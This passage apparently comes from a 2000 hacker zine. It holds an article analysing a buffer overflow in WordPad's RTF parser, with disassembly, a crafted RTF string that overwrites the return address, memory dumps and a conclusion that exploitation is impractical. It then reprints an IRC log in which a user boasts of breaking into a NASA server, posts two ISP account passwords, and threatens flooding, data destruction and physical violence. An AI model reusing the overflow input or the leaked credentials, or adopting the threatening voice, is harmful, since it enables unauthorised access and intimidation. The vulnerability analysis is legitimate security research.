001B:6C0268BE jc 6C0268E9 ; this is never executed
001B:6C0268C0 movzx eax, byte ptr [ebp-01] ; get the current char
001B:6C0268C4 test byte ptr [eax+6C00C6B8], 01 ; is is 'A'-'Z' or 'a'-'z' ?
001B:6C0268CB jz 6C0268E9 ; no -> go there
001B:6C0268CD mov al, [ebp-01] ; get the current char
001B:6C0268D0 or al, 20 ; make it lowercase
001B:6C0268D2 mov [ebx], al ; store it in the buffer
001B:6C0268D4 inc ebx
001B:6C0268D5 mov ecx, [esi+1c] ; restore ecx
001B:6C0268D8 cmp [esi+18], ecx ; reached the end of the sting?
001B:6C0268DB jnz 6C0268AE ; no -> loop again
ECX is a pointer to the memory location where the RTF file is loaded. It
points to the character that we are currently copying. EBX points to the
buffer. The buffer starts at 0012F1A8.
By the way, notice that the current charcacter is stored at 0012F1C8 (the
third line in the disassembly). This means that out buffer is only 32 bytes
long, and we have another local variable after it. This doesn't really
matter, because the copying process works even if we overwrite this
variable (it gets restored). If we put some shellcode there, we need to
know that this particular byte will be changed to the first character after
the end of the string. In our case, this is '}'
Notice the "test byte ptr [eax+6C00C6B8], 01" instruction. At this
memory location (6C00C6B8) we have an array of bytes, corresponding to each
ASCII value.
The array at 6C00C6B8
+00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+30 06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
+40 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+50 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+60 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+70 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+C0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
The only ASCII characters that will pass the JZ condition after the TEST
instruction are the letters 'A'-'Z' and 'a'-'z' (ASCII values 41-5A and
61-7A). If any other character is reached, the copying is ended and the
buffer is NULL terminated.
Next we try really taking over the return address.
{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAA(more As)}
'jjjj' overwrites the saved EBP and the return address becomes 'kkkk'. After
the overwritten return address, we have more As.
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 70707070 71717171 61616161 iii}jjjjkkkkaaaa
0023:0012F1D8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1E8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1F8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F208 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F218 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F228 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F238 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F248 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F258 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F268 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F278 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F288 61616161 61616161 00000000 00000000 aaaaaaaa........
0023:0012F298 00000000 00000000 00000000 00000000 ................
0023:0012F2A8 00000000 000C1814 00000000 00000000 ................
At 0012F2AC we have a pointer to the current character in the file buffer.
ECX is saved to this location (referenced as esi+1C) before the copying, and
restored afterwards. This value is updated after every copied byte. If we
overwrite it, it will start pointing to a new memory location. The copy loop
will try to read the bytes to copy from there and probably crash. Even if we
somehow manage to overwrite this with a valid memory pointer, this will be
the last byte copied from our string.
This limits us to 216 'A's after the 'jjjjkkkk'.
III. Is an exploit possible ?
Exploiting this buffer overflow will be hard. May be not impossible, but
very hard. We have only 216 bytes to squeese our shell code in, and we can
use 26 characters - the letters from 'a' to 'z'.
Writing a shell code with no nulls is hard, writing one only with letters is
almost impossible.
First, we need some way of pointing the return address to something usefull.
We cannot point it to the stack, because the stack address contains
'prohibited' characters. After the RET instruction the ESP points to the
second part of our string (the one after 'jjjjkkkk'). We need a JMP ESP or
CALL ESP instruction. The usual approach is to look at the loaded DLL-s at
the time of the crash and to find one of these instructions at some memory
location. Then we can point the return address to this memory location and
have it jump back to our shell code. The problem is that we need the address
of this memory location to consist only of lowercase letters.
c:\>listdlls.exe wordpad
ListDLLs V2.1
Copyright (C) 1997-1999 Mark Russinovich
http://www.sysinternals.com
------------------------------------------------------------------------------
WORDPAD.EXE pid: 275
Base Size Version Path
0x029a0000 0x34000 4.00.1381.0096 C:\Program Files\Windows NT\Accessories\wordpad.exe
0x77f60000 0x5e000 4.00.1381.0174 C:\WINNT\System32\ntdll.dll
0x5f800000 0xee000 4.21.0000.7160 C:\WINNT\System32\MFC42u.DLL
0x78000000 0x40000 6.00.8397.0000 C:\WINNT\system32\MSVCRT.dll
0x77f00000 0x5e000 4.00.1381.0178 C:\WINNT\system32\KERNEL32.dll
0x77ed0000 0x2c000 4.00.1381.0115 C:\WINNT\system32\GDI32.dll
0x77e70000 0x54000 4.00.1381.0133 C:\WINNT\system32\USER32.dll
0x77dc0000 0x3f000 4.00.1381.0203 C:\WINNT\system32\ADVAPI32.dll
0x77e10000 0x57000 4.00.1381.0193 C:\WINNT\system32\RPCRT4.dll
0x77d80000 0x32000 4.00.1381.0133 C:\WINNT\system32\comdlg32.dll
0x70970000 0x1a8000 4.72.3110.0006 C:\WINNT\system32\SHELL32.dll
0x70bd0000 0x44000 5.00.2314.1000 C:\WINNT\system32\SHLWAPI.dll
0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll
0x77b20000 0xb6000 4.00.1381.0190 C:\WINNT\system32\ole32.dll
0x76aa0000 0x6000 4.00.1371.0001 C:\WINNT\System32\INDICDLL.dll
0x77c00000 0x18000 4.00.1381.0027 C:\WINNT\System32\WINSPOOL.DRV
0x775a0000 0x14000 0.02.0000.0000 C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
0x6c000000 0x2e000 4.00.0993.0004 C:\WINNT\System32\RICHED32.dll
0x70400000 0x77000 5.00.2314.1000 C:\WINNT\System32\mlang.dll
These are the loaded DLLs that we can use. The perfect DLL would be the same
on Windows 95, 98, SE, NT 4 with all service packs and on Win2K.
Unfortunately such DLL is just a dream. Our choices are really limited.
Looking at the base addresses, we can eliminate most of the DLLs, because
they don's have letter addresses. This leaves us only with one DLL that we
can use:
0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll
We can only use the code in the range from from 71616161 to 7161707A.
After disassembling the DLL and looking at the code, we clearly see that
there is no JMP ESP or CALL ESP instruction.
There is no way to execute the shellcode.
Even if we could do it, making the shellcode do something usefull would be
pain in the ass. The restrictions are too harsh.
After the RET instruction, at ESP-50 we have a pointer to the beginning of
the buffer, where the raw file is loaded. This buffer holds the raw file
contents, so we can use NULLs and non-letter characters. Unfortunately, this
buffer is in the heap and we can not execute any code from there. We need to
copy the code to the stack first.
The whole situation sucks. At least the Micro$oft users are saved once
again! But not for long :-)
Solar Eclipse
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
"parwo floodq prowidera sled towa go triq" Anonymous
........... . . . . . . . . . . . . . .
Session Start: Wed Jan 05 13:21:29 2000
Session Ident: MOONSPELL (~darkstar@193.193.163.224)
<MOONSPELL> otkade si?
<MOONSPELL> imash li wrazka s iterra ent?
<ilia20> imam
<ilia20> :)
<ilia20> ot sofia
<ilia20> sum
<MOONSPELL> ti admina li si ?
<ilia20> ne
<ilia20> shto ?
<ilia20> poznat sum na shefa
<MOONSPELL> kaji na shefa da spre accta s user martinku i dashinov
<MOONSPELL> shtoto prez tqh se skanira i wliza w NASA
<ilia20> kak se vliza v nasa be ? :)
<MOONSPELL> pcnnfs
<ilia20> ili tva nasa e nekaw ruter/server?
<MOONSPELL> codonicprint.jpl.nasa.gov
<MOONSPELL> towa e probito s acc na iterra
<ilia20> nima
<ilia20> ti v NASA li si ?
<MOONSPELL> prowidera ti shte ima nepriqtnosti, ako ot NASAta nadushat otkade
se e wlizalo
<ilia20> kosmonavt li si kwo ? :))
<MOONSPELL> ne, prosto i az q hakwam
<ilia20> i otkade znaesh che e taka ?
<ilia20> axa
<ilia20> i shto mislish che prez tia accounti na iterra e hackvan servera?
<MOONSPELL> shtoto, az minawah ottam
<ilia20> imal si accountite li ?
<MOONSPELL> haknah wi prowidera, i samo tezi useri imaha lesna parola za
johna
<MOONSPELL> dashinov:irin@
<MOONSPELL> martinku:bemyheroine
<ilia20> e i ?
<ilia20> moje drug user da e bil
<MOONSPELL> az samo ti kazwam, smeni passowete, ili shte iztriq celia wi
dial-up servera za da se usetite
<ilia20> o pochnaxme i da zaplashvame :-)))
<ilia20> shto si tolkoz zle nastroen kam iterra?
<MOONSPELL> chao, aide az otiwam da si administriram serwera w netbg
<ilia20> by the way ti ot koi grad si ? poznawash li edin raicho ot pleven?
<ilia20> ok
<ilia20> shtom te vleche
<ilia20> :)
<MOONSPELL> shtoto e lame prowider
<ilia20> aha
<MOONSPELL> kaji we?
<ilia20> kwo da ti kaja
<MOONSPELL> s linux sam
<ilia20> kat si s linux da ne si 100 kila
<MOONSPELL> ma ti mai iskash flood po iterra, taka li da go razbiram? :)))
<MOONSPELL> filtara w Orbitel nqma da ti pomogne mnogo :)
<ilia20> samo 1 iskam da ti kaja:
<ilia20> ima 2 vida hackeri
<ilia20> 1viat
<ilia20> sa svesnite hackeri
<ilia20> te si hackvat
<ilia20> uchat nowi nesta
<ilia20> i tn
<ilia20> i obsto vzeto ne prawiat problemi
<ilia20> daje takiwa xopa dvijat progresa
<ilia20> i 2ria vid hackeri
<ilia20> sa drishliovci
<ilia20> koito
<ilia20> sa pulni komplexari i limoni v jivota
<ilia20> demek neudachnici
<ilia20> i izbivat komplexi i kwo li ne
<ilia20> zakanwat sre
<ilia20> se
<ilia20> zaplashwat
<ilia20> i tn
<ilia20> sam preceni ot koi vid si
<MOONSPELL> znam che sam wtorite:)))
<MOONSPELL> parwo floodq prowidera sled towa go triq
<MOONSPELL> i sled tfa hodi se orpawqi
<ilia20> sled tva she ti byde schupena glawata
<ilia20> dokat ti doide akula
<MOONSPELL> nqma kak da me fanat :)))
<ilia20> koito se e pomislil za velik se e sburkal
<ilia20> vinagi ima kak
<ilia20> za vsichko
<MOONSPELL> mi nameri me i ti shte izqdesh boya, shtoto se ima koi da me
zashtiti
<ilia20> hehehe
<ilia20> :-))))
<MOONSPELL> naistina w kv. Witosha ima malko hora, ama pone poznawam malko
mutri i im znam mobilkite
<ilia20> ochilarko
<ilia20> s mutri li trugna da me plashish be
<ilia20> haha
<ilia20> ti kuv muj si be?
<ilia20> spored mene tebe nesto seriozno ti ima v glawata
<ilia20> hardueren bug
<ilia20> :)))))
<ilia20> aide ciao che i az imam raboti za vurshene
Session Close: Wed Jan 05 14:08:29 2000
EOF
]]>